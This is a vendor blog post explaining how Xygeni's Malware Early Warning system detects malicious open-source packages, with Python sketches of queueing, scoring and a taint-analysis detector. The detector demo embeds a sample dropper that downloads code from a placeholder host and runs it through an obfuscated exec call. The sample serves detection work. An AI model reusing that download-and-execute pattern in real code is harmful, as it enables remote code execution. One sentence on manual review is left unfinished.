This is the fourth episode in the series of posts about malicious components, where we present the Xygeni approach for handling this threat, as part of our coverage for Open Source Security.

We saw that excessive trust in open source components of uncertain origin is exploited by wrongdoers of all kinds to deliver unexpected behavior, which is either run on developer machines and CI/CD systems or embedded into the victim organization’s software and thus passed along to the organization’s clients. In episode #2 we dissected the attacks that use public registries to deliver malware and what we have learned from watching how the bad actors operate. In the previous episode, #3, we examined the controls that work (and those that fail) against this threat.



Now it is time to look at our approach to the problem. In this episode, we present the strategy we follow at Xygeni for our Malware Early Warning (MEW) system: how this multi-stage system works in real time when a new package version is released, how evidence is captured from different sources, how triage is done, which classification criteria we follow, and why some manual analysis is still needed to confirm the nature of a malicious package candidate. We will also explain how we are helping NPM, GitHub, PyPI, and other key infrastructures in the open-source ecosystems to reduce the dwell time for malware.

The pipeline

Xygeni Malware Early Warning (MEW) continuously processes components: package tarballs for libraries and frameworks in supported programming ecosystems like JavaScript/Node or Python, Docker / OCI container images, and extensions and plugins for tools like IDEs or CI/CD systems. Such components are published in public registries with different levels of user vetting.

The following is a schematic view of how the system operates:

The discoverer process gets the feed of publishing events. A publishing event is the creation of a new version of a new or existing component. As the popular registries do not provide a pub-sub mechanism for interested consumers, this is often done by polling the registry for recent events. An excellent project from the OpenSSF, package-feeds, supports popular registries like PyPI or Maven Central and provides a unified feed-based interface. In MEW we added some specific implementations that reduce the wait time, for example a replica of the CouchDB database used by NPM, kept in sync with the public registry database.
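The polling approach can be sketched as follows. This is a minimal illustration, not the MEW discoverer: the `PublishingEvent` type, the `new_events` helper, and the package names are hypothetical, and the actual network poll is replaced by in-memory lists. The point it shows is that repeated polls overlap, so the discoverer has to remember which publishing events it has already queued.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class PublishingEvent:
    """Hypothetical record for 'a new version of a component was published'."""
    ecosystem: str  # e.g. "npm" or "pypi"
    name: str
    version: str


def new_events(polled, seen):
    """Return the events not seen in earlier polls, preserving feed order."""
    fresh = []
    for event in polled:
        if event not in seen:
            seen.add(event)
            fresh.append(event)
    return fresh


# Two consecutive polls of a registry feed; the second overlaps the first.
seen = set()
first_poll = [
    PublishingEvent("npm", "example-lib", "1.0.0"),
    PublishingEvent("pypi", "example-tool", "0.3.0"),
]
second_poll = [
    PublishingEvent("pypi", "example-tool", "0.3.0"),  # already seen
    PublishingEvent("npm", "example-lib", "1.0.1"),    # new version
]

batch1 = new_events(first_poll, seen)
batch2 = new_events(second_poll, seen)
print(batch2)  # only the event for example-lib 1.0.1
```

A registry replica, such as the CouchDB one mentioned above, would replace polling with a change stream, but the need to deduplicate events stays the same.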

In Xygeni, we have an inventory[1] of all the components (directly or indirectly) used by our customers’ software. Customers’ component coordinates are fed regularly to MEW to prioritize the analyses: components used by our customers are processed earlier. Priority is also based on the reputation of the publisher and the criticality of the component, so components coming from publishers with low reputation are also moved up the queue.
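A priority queue along these lines could look like the sketch below. The formula is an assumption made for illustration: reputation is taken as an integer from 0 to 100, customer usage subtracts a large constant, and criticality is left out. The `AnalysisQueue` class and the component names are hypothetical.

```python
import heapq
from itertools import count

CUSTOMER_BOOST = 1000  # assumed constant: customer dependencies always go first


def priority(used_by_customer, publisher_reputation):
    """Lower value means analyzed earlier. Reputation is assumed to be 0..100."""
    value = publisher_reputation  # low reputation gives a small value
    if used_by_customer:
        value -= CUSTOMER_BOOST
    return value


class AnalysisQueue:
    """Pending component versions, ordered by priority and then by arrival."""

    def __init__(self):
        self._heap = []
        self._arrival = count()  # tie-breaker that keeps insertion order

    def push(self, component, used_by_customer, publisher_reputation):
        key = priority(used_by_customer, publisher_reputation)
        heapq.heappush(self._heap, (key, next(self._arrival), component))

    def pop(self):
        return heapq.heappop(self._heap)[2]

    def __len__(self):
        return len(self._heap)


queue = AnalysisQueue()
queue.push("pkg-a@1.0.0", used_by_customer=False, publisher_reputation=90)
queue.push("pkg-b@2.1.0", used_by_customer=True, publisher_reputation=80)
queue.push("pkg-c@0.0.1", used_by_customer=False, publisher_reputation=10)

order = [queue.pop() for _ in range(len(queue))]
print(order)  # ['pkg-b@2.1.0', 'pkg-c@0.0.1', 'pkg-a@1.0.0']
```

The customer dependency comes out first, followed by the component from the low-reputation publisher.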

The analyzers then consume the pending components in the priority queue. When a component version is selected for analysis, its tarball is downloaded from the registry. Note that it is the packaged, binary component that is analyzed. Most open source components come from an open source repository, often at github.com, but that repository is used for context only. The malware is always searched for in the component tarball, because threat actors systematically lie about the sources they claim to have used to build the tarball they release.

From the user’s perspective



I hear you thinking: How can I benefit from knowing about a malicious package version early? In the episode “Anatomy of Malicious Packages: What Are the Trends?” we saw that the total dwell time is in the range of days, while the first notification from MEW to customers using the affected component arrives within minutes. With a simple guardrail[2] you may block the build. There are two alert levels: one entirely automated, raised when the engine concludes that there is potential malware, and a later notification sent when our security team confirms the presence of malware by manual inspection. Waiting until the registry confirms the malware and removes it is typically too late due to the long exposure window.

The organization may use a guardrail that checks whether there is a component with potential malware (at either of the two alert levels) or, via the API, quickly find out whether any of the direct or indirect dependencies of a software project is a malicious component.
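The guardrail check described above can be sketched in a few lines. Everything here is hypothetical: the `Alert` enum, the `guardrail` function, and the package coordinates are illustrative names, and the alert data is a local dictionary rather than a response from the Xygeni API.

```python
from enum import Enum


class Alert(Enum):
    QUARANTINED = "quarantined"  # first alert, raised automatically by the engine
    CONFIRMED = "confirmed"      # second alert, raised after manual review


def guardrail(dependencies, alerts, block_on=(Alert.QUARANTINED, Alert.CONFIRMED)):
    """Return the dependencies whose alert level should break the build."""
    return [dep for dep in dependencies if alerts.get(dep) in block_on]


# Direct and indirect dependencies of a project (made-up coordinates).
dependencies = ["npm:example-lib@1.0.1", "npm:example-util@4.2.0"]
# Alerts currently open for component versions (made-up data).
alerts = {"npm:example-lib@1.0.1": Alert.QUARANTINED}

offending = guardrail(dependencies, alerts)
build_allowed = not offending
print(offending, build_allowed)
```

An organization that only wants to block on confirmed malware would pass `block_on=(Alert.CONFIRMED,)`, trading a longer exposure window for fewer interrupted builds.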

How MEW Works: Inside Details

The Core: Malware Detection Engine

The analyzer uses different detectors to capture evidence of wrongdoing. Detectors combine static analysis, capabilities analysis, and context analysis[3], as described in the previous post of this series.

At Xygeni, we have an engineering team with long experience in static analysis, and this is the main difference from other anti-malware solutions. Note that for some ecosystems the packaged tarball contains either source code (e.g. JavaScript or TypeScript code for NPM packages, Python sources for PyPI packages), or compiled code close enough to the source code for static analysis (e.g. bytecode in JAR files for Maven). For others, such as container images, binary executables are common, so capabilities inference is the technique used, along with conventional malware detection based on YARA rules and malware signatures.

Please note that simple techniques like regular expressions or signatures are not adequate for detecting malicious behavior. Imagine detecting a dropper or downloader: some code or binary is located in the package or downloaded from an external domain unrelated to the component (it could be one from a large list of domains purchased by the threat actor[4], or a legitimate domain used to evade detection). That code is then executed using one of the functions available for that purpose. The code can be transformed to hide the download URL or the function used for running the downloaded code. Detecting this in the general case requires full data-flow analysis, using the full machinery of static analysis, or a sandboxed execution (which only works if the conditions for the malicious behavior to run are actually met).
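To make the difference concrete, here is a toy comparison on Python source, using only the standard `ast` and `re` modules. It is a deliberately tiny, straight-line taint tracker written for this post, not the MEW engine: the `SOURCES` and `SINKS` sets, the helper names, and the sample snippet are all assumptions, and real analyzers handle control flow, functions, and many more obfuscations. The sample is only parsed, never executed.

```python
import ast
import re

# A downloader that hides the name of the function used to run the payload.
SAMPLE = '''\
import urllib.request as u
run = getattr(__builtins__, "ex" + "ec")
payload = u.urlopen("http://example.invalid/p").read()
stage = payload.decode()
run(stage)
'''

SOURCES = {"urlopen"}     # assumed: calls that fetch remote data
SINKS = {"exec", "eval"}  # assumed: calls that run code


def fold_str(node):
    """Fold constant string concatenations such as "ex" + "ec"."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left, right = fold_str(node.left), fold_str(node.right)
        if left is not None and right is not None:
            return left + right
    return None


def callee_name(call):
    """Name of the called function or method, if it is syntactically visible."""
    func = call.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def is_tainted(expr, tainted):
    """True if expr calls a source or reads a variable holding downloaded data."""
    for node in ast.walk(expr):
        if isinstance(node, ast.Call) and callee_name(node) in SOURCES:
            return True
        if isinstance(node, ast.Name) and node.id in tainted:
            return True
    return False


def find_download_and_run(source):
    """Return line numbers where downloaded data reaches a code-execution sink."""
    tainted, sink_aliases, hits = set(), set(SINKS), []
    for stmt in ast.parse(source).body:
        if isinstance(stmt, ast.Assign) and isinstance(stmt.targets[0], ast.Name):
            target, value = stmt.targets[0].id, stmt.value
            # Sink resolved dynamically: name = getattr(obj, "ex" + "ec")
            if (isinstance(value, ast.Call) and callee_name(value) == "getattr"
                    and len(value.args) >= 2 and fold_str(value.args[1]) in SINKS):
                sink_aliases.add(target)
            if is_tainted(value, tainted):
                tainted.add(target)
        for node in ast.walk(stmt):
            if (isinstance(node, ast.Call) and callee_name(node) in sink_aliases
                    and any(is_tainted(arg, tainted) for arg in node.args)):
                hits.append(node.lineno)
    return hits


regex_hit = re.search(r"\b(exec|eval)\s*\(", SAMPLE)
hits = find_download_and_run(SAMPLE)
print(regex_hit)  # None: the pattern never sees a literal exec( or eval(
print(hits)       # [5]: run(stage) executes data that came from urlopen
```

The regular expression finds nothing because the sink name is assembled at run time, while following the data from the download to the call exposes the dropper.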

Threat actors tend to reuse the same techniques, and detectors for those techniques were designed and implemented. There are also some pre-processing steps, for example for removing obfuscation, which are often needed to uncover the hidden behavior.

Adding Context

Some detectors use context information. For example, a mismatch between the version in the component registry and the tags/releases in the associated GitHub repository is strong evidence that a bad actor may have gained publishing credentials for the registry but not for the GitHub repository. Attacks like the one affecting crypto wallet vendor Ledger could be easily detected by this mismatch.
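A context detector for this mismatch might be sketched as below. The function names and the version data are hypothetical, and the tag normalization (dropping a leading "v" before a digit) is an assumption about one common tagging convention. Fetching the tags from the repository is left out.

```python
def normalize(tag):
    """Drop a leading 'v' or 'V' so that the tag 'v1.2.3' matches version '1.2.3'."""
    if len(tag) > 1 and tag[0] in "vV" and tag[1].isdigit():
        return tag[1:]
    return tag


def has_version_mismatch(registry_version, repo_tags):
    """True when the published version has no matching tag in the repository."""
    return registry_version not in {normalize(tag) for tag in repo_tags}


repo_tags = ["v1.2.2", "v1.2.3"]  # tags found in the source repository (made up)

suspicious = has_version_mismatch("1.2.4", repo_tags)  # published, never tagged
expected = has_version_mismatch("1.2.3", repo_tags)    # published and tagged
print(suspicious, expected)  # True False
```

A mismatch on its own is only evidence, since some projects never tag releases, so it is better treated as one finding among others than as a verdict.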

A maliciousness score (MS) is computed from the findings of the detectors run, based on the strength of the evidence captured. Not all findings carry the same weight, and the order of execution is relevant.
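The exact formula behind the MS is not given here. As one plausible illustration, the sketch below combines findings with a "noisy-OR": each finding carries an assumed strength between 0 and 1, and every additional finding pushes the score closer to 1. The detector names and strengths are made up, and the ordering aspect mentioned above is not modeled.

```python
from math import prod


def maliciousness_score(findings):
    """Noisy-OR of evidence strengths: 1 - product of (1 - strength)."""
    return 1.0 - prod(1.0 - strength for _, strength in findings)


findings = [
    ("install_script_downloads_binary", 0.5),  # hypothetical detector names
    ("obfuscated_code", 0.5),
]

ms = maliciousness_score(findings)
print(ms)  # 0.75
```

With this choice, one strong finding dominates several weak ones, and a component with no findings scores 0.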

User and Component Reputation

Not all open-source developers are created equal!

A reputable developer may have their NPM account hijacked (this happens even with security-aware people), and malware published using that account. Obviously, reputation should fall abruptly, and only recover to past glory when the hijacked account is recovered and the developer fixes the conditions that led to the account takeover. Reputation is hard to earn but can be lost in an instant.

At MEW, we have implemented a comprehensive reputation management system to reward positive behavior and penalize suspicious activities. This system begins with new users in a neutral stance and adjusts their reputation based on their ongoing activities.

A user’s reputation improves through positive actions such as maintaining active social media accounts, enabling multi-factor authentication, contributing regularly to projects, and signing commits with verifiable keys. Conversely, reputation deteriorates due to hostile actions like publishing malware, using disposable email addresses, not signing commits, or exhibiting unusual patterns in contributions.
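The reward and penalty idea can be sketched as a table of adjustments applied to a neutral starting score. The scale (0 to 100, neutral at 50), the signal names, and every number below are assumptions chosen for illustration; they are not the values used by MEW.

```python
NEUTRAL = 50  # assumed starting reputation for a new user, on a 0..100 scale

# Hypothetical adjustments per observed signal.
ADJUSTMENTS = {
    "active_social_accounts": +5,
    "mfa_enabled": +10,
    "regular_contributions": +5,
    "signed_commits": +10,
    "disposable_email": -20,
    "unsigned_commits": -5,
    "unusual_contribution_pattern": -15,
    "published_malware": -100,  # reputation is lost in an instant
}


def reputation(signals, start=NEUTRAL):
    """Apply each observed signal to the starting score, clamped to 0..100."""
    score = start + sum(ADJUSTMENTS[signal] for signal in signals)
    return max(0, min(100, score))


newcomer = reputation([])
careful = reputation(["mfa_enabled", "signed_commits"])
hijacked = reputation(["mfa_enabled", "signed_commits", "published_malware"])
print(newcomer, careful, hijacked)  # 50 70 0
```

The large penalty for published malware reflects the point made earlier: good signals accumulate slowly, while one confirmed incident wipes them out until the account is recovered.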

Our system’s primary goal is to ensure a safe and trustworthy environment. It achieves this by dynamically adjusting user reputations based on various factors, while also respecting privacy concerns and the limitations of different registries.

An internal reputation score is computed for the user (linking the registry account and the GitHub account when possible). Along with the maliciousness score, it is used to classify the component under analysis and to better qualify who is behind the publication.

Evidence on Malicious Behavior Was Found. So What? The Manual Review Process

The current classifier assigns the analyzed component version to one of the “confirmed malicious”, “probably malicious”, “high risk”, “low risk” or “nonmalicious” categories, based on thresholds on the scores that condense the findings and the user/component reputation. A classification into the “high risk” or “probably malicious” categories triggers the manual review and the first notification. The “confirmed malicious” category is set after manual review, or when the evidence matches the evidence for a previous version that was confirmed malicious.
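A threshold-based classifier of this kind can be sketched as follows. The thresholds, the way reputation discounts the maliciousness score, and the function names are all assumptions for illustration; only the category names and the rule about which categories trigger manual review come from the description above.

```python
def classify(ms, reputation, confirmed=False):
    """Map a maliciousness score (0..1) and a reputation (0..100) to a category."""
    if confirmed:
        # Set after manual review, or when evidence matches a confirmed version.
        return "confirmed malicious"
    # Assumed combination: a perfect reputation halves the risk.
    risk = ms * (1.0 - 0.5 * reputation / 100)
    if risk >= 0.8:
        return "probably malicious"
    if risk >= 0.5:
        return "high risk"
    if risk >= 0.2:
        return "low risk"
    return "nonmalicious"


def triggers_review(category):
    """Categories that open a manual review and send the first notification."""
    return category in {"high risk", "probably malicious"}


unknown_publisher = classify(0.9, reputation=0)
trusted_publisher = classify(0.9, reputation=100)
print(unknown_publisher, triggers_review(unknown_publisher))
print(trusted_publisher, triggers_review(trusted_publisher))
```

In this sketch the same evidence leads to a review for an unknown publisher but not for a highly reputable one, which is why an abrupt reputation drop after an account takeover matters.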

When enough evidence exists for potential malicious behavior, a first alert (quarantine alert) is emitted to the affected organizations. As mentioned before, that may block the installation or build of software that depends on the quarantined component.

The alert also creates an issue in the MEW internal dashboard so that security analysts can start the manual review process for the component. The team has specialized tooling (sandbox, deobfuscators, a distribution for malware research, malware reporting tools) for quickly assessing the nature of the component version under investigation. Most of the malware (“the anchovies” or unsophisticated malicious components) is reviewed

The review concludes with one of two outcomes. If the component is safe, the automatic analysis engine produced a false positive, which is fed back to the machine learning classifier so it can learn the pattern. If the component is confirmed malicious, it is responsibly disclosed to the public registry, following the registry’s reporting process. A second notification is then sent to the affected organizations, which in turn may unquarantine the component, or permanently block it in their version upgrade process or in the component firewall used in their internal registry.

This setup lets us analyze tens of thousands of new versions daily and identify the tens that are probably malicious, which we then review manually. Remember from the previous episode that one in ten thousand is the rate of malicious components we currently see in the wild.

Reporting to the Registry

We found that most public registries, one of the backbones of the open source infrastructure, provide fairly limited mechanisms for reporting security issues, and malicious components in particular. We are working to improve the underlying organization of the reporting process. Typically, the most we receive is a feedback email from the registry’s security team confirming that the component was removed from the registry.

Sometimes the registry is abused in ways that break its terms of use but do not cause malicious behavior in the delivered software. This is also reported to the registry, but organizations are not notified, to limit the noise.

Future work

Many improvements are currently on the roadmap. First and foremost, a public portal for open-source component health, particularly related to the evidence found for potential maliciousness, is currently under development. This is intended as a modest contribution to the open-source community. Stay tuned.

Another ongoing development is an improved machine learning classifier. MEW will learn from past classifications. The vector of findings from engine detectors, plus the derived maliciousness score and reputation score for both the component and the publisher (“the evidence found”), is used as input to a machine learning system that updates the classifier model. The output variable is simply whether the registry confirmed that the component was malicious. This is code-named “the Oracle” and will help with a more precise qualifier, designed to be sound (high recall, i.e. do not miss malicious components) but with fewer false positives (do not report safe components as malicious).

A criticality score will be added to the prioritization criteria, alongside membership in the set of customers’ dependencies and the low reputation of the publisher. It is clear that projects with more influence and importance should be considered earlier for analysis. We will not reinvent the wheel here, and will follow the Open Source Project Criticality Score.

Support for additional ecosystems is under development. Widespread technologies and tools like PHP or Jenkins plugins are on the roadmap.

We are also exploring whether AI could help streamline the manual review process for the few more sophisticated malicious components.

In the next and final installment of this series, “Exploiting Open Source: What To Expect From The Bad Guys”, we will focus on the latest ways in which adversaries are making their attacks stealthier, harder to detect, more targeted to specific industries, and more profitable. Will ransomware attacks be delivered using this vehicle? How are the bad guys leveraging AI tools to deliver more sophisticated malware? Are top popular projects at risk? The aim is to give readers a sense of this arms race, and what to expect in the short term (second half of 2024) and the medium term (2025).

We will conclude with some thoughts on what baby steps the community could take without changing the openness of the open-source world too much. For example, a more efficient mechanism for reporting malware to public registries, and sharing evidence of potentially malicious components with the registries and the community, would be a small step in the right direction toward the goal of closing the doors to threat actors.

Malware in open-source components should not disrupt the enormous benefits that the open-source community has brought to our society.

- [1] Our scanner detects open-source components referenced by the software projects analyzed, so the full up-to-date dependency graph is known, at least for projects that are scanned regularly. The Xygeni OSS exposes an API that customers may also use when whitelisting a component of interest, including information on vulnerabilities and evidence of malicious behavior.

- [2] A guardrail may break the build if a condition matching security issues is detected. Security findings like a critical and reachable vulnerability or the use of a quarantined component could be deemed severe enough to break the build for the affected software.

- [3] Our security analysts run the component or its install scripts in a sandboxed environment when necessary. However, MEW does not perform dynamic analysis, primarily because in targeted attacks the malicious behavior is not always triggered, and because of the evasion logic that threat actors use to defeat dynamic analysis.

- [4] This technique was given a name, Registered Domain Generation Algorithms or RDGA, and new threat actors like the so-called Revolver Rabbit invested as much as $1M in 500K domains, showing how profitable the cybercrime industry is.